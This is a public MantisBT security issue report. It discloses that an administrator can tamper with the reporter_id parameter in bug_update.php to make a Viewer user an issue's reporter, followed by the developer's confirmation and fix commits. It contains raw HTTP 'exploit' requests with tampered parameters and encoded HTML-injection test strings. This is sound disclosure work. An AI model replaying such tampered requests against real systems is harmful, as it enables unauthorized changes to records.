View Issue Details

IDProjectCategoryView StatusLast Update
0027350mantisbtsecuritypublic2020-12-30 07:37
Reporterd3vpoo1 Assigned Todregad  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
PlatformWindowsOSWindowsOS VersionWindows10
Product Version2.24.3 
Target Version2.24.4Fixed in Version2.24.4 
Summary0027350: When updating an issue, a Viewer user can be set as Reporter
Description

This is the same on my old report (If I am correct) however this allows the admin to set the reporter to viewer role

This can be found on bug_update.php and the parameter reporter_id which if the admin set to the id of viewer, this will reflect as the viewer report the issue..

Steps To Reproduce
  • As admin go to any issues

  • Click the Edit button

  • it will redirect to bugs/bug_report_page.php

  • Edit the value of reporter

In normal case the select input will render the "admin" or those role who can access it like updater,manager etc but the viewer is not included

  • Open your proxy

  • Set it to anything and click the Update Information buttin

Request

POST /mantisbt/bug_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 504
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/bug_update_page.php?bug_id=1&reporter_edit=true
Cookie: MANTIS_collapse_settings=|sidebar:1; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=561q750p34t3qbvgmm7p3jc3nr; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=075ae51b44729bb373d475b9049d227e104536a82d905c235d985da478725b21
Upgrade-Insecure-Requests: 1

bug_update_token=20200926zspEME1SbPkF6CSte-bC0TC8FltyOYtv&bug_id=1&last_updated=1601112082&category_id=1&view_state=10&reporter_id=6&handler_id=6&priority=30&severity=50&reproducibility=70&status=50&resolution=10&platform=&os=&os_build=&summary=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&description=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&steps_to_reproduce=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&additional_information=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&bugnote_text=

Response

HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 09:24:52 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 09:24:52 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 09:24:52 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/view.php?id=1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

Exploit

  • Do the same thing but change the value of reporter_id to a viewer user, in my case my viewer id is 3

Exploit request

POST /mantisbt/bug_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 504
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/bug_update_page.php?bug_id=1&reporter_edit=true
Cookie: MANTIS_collapse_settings=|sidebar:1; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=561q750p34t3qbvgmm7p3jc3nr; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=075ae51b44729bb373d475b9049d227e104536a82d905c235d985da478725b21
Upgrade-Insecure-Requests: 1

bug_update_token=20200926PewmDfYCD7hbBvP9CIB-F4lpijxiHAiy&bug_id=1&last_updated=1601112292&category_id=1&view_state=10&reporter_id=3&handler_id=6&priority=30&severity=50&reproducibility=70&status=50&resolution=10&platform=&os=&os_build=&summary=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&description=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&steps_to_reproduce=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&additional_information=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&bugnote_text=

Exploit response

HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 09:26:14 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 09:26:14 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 09:26:14 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/view.php?id=1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
  • Refresh the site and you can see the viewer become the reporter
Additional Information

I try to edit the handler_id and set this to viewer but it just return the Application Error 17

In case you need a PoC, please mention it(I can't upload any attachment right now due to internet issues..)

TagsNo tags attached.

Relationships

related to 0027268 closeddregad Admin can get issues assigned to users not allowed to handle them 

Activities

d3vpoo1

d3vpoo1

2020-10-13 00:39

reporter   ~0064544

Hi ! Any possible update here and to other tickets?

dregad

dregad

2020-11-21 20:08

developer   ~0064675

Problem is confirmed. An extra sanity check will be added to Bug Update page to prevent this scenario.

d3vpoo1

d3vpoo1

2020-11-22 18:29

reporter   ~0064679

Thank you for the update.. and apologize again for extra work for 2.4.x version..

dregad

dregad

2020-11-22 18:53

developer   ~0064681

Thanks for your patience, and sorry it took me so long to get around to this.
Spent a good bit of my week-end working on your (and other) security issues. Was hoping to have a patch for all of them, but didn't quite make it. Stay tuned.

d3vpoo1

d3vpoo1

2020-11-24 18:34

reporter   ~0064696

Last edited: 2020-12-02 20:06

Greetings! Thank you for the experience and for the CVE's, as I promised this batch of reports will be my last issues/submissions (including on the Github issues). The whole experience is fun and I learned a lot on this open source, on this one I read the documentation, search a lot of different implementation (for addons), use Git for Integration and even I write my first exploit... In the near future I would like to test this one again and even recommend this platform... Once again thank you so much and apologize for the extra work...

Related Changesets

MantisBT: master 06524d75

2020-11-21 23:25

dregad


Details Diff
Ensure given Reporter is allowed to report issues

When updating an issue, if the user specified as reporter does not have
sufficient access level to report issues, throw an error.

Fixes 0027350
Affected Issues
0027350
mod - bug_update.php Diff File

MantisBT: master a528b607

2020-12-05 13:22

dregad


Details Diff
Allow bug update if original reporter missing

Adding validation on reporter id caused Mantis to trigger error and
prevent bug update, when editing a bug and the user who reported it
no longer exists.

Issue 0027350
Affected Issues
0027350
mod - bug_update.php Diff File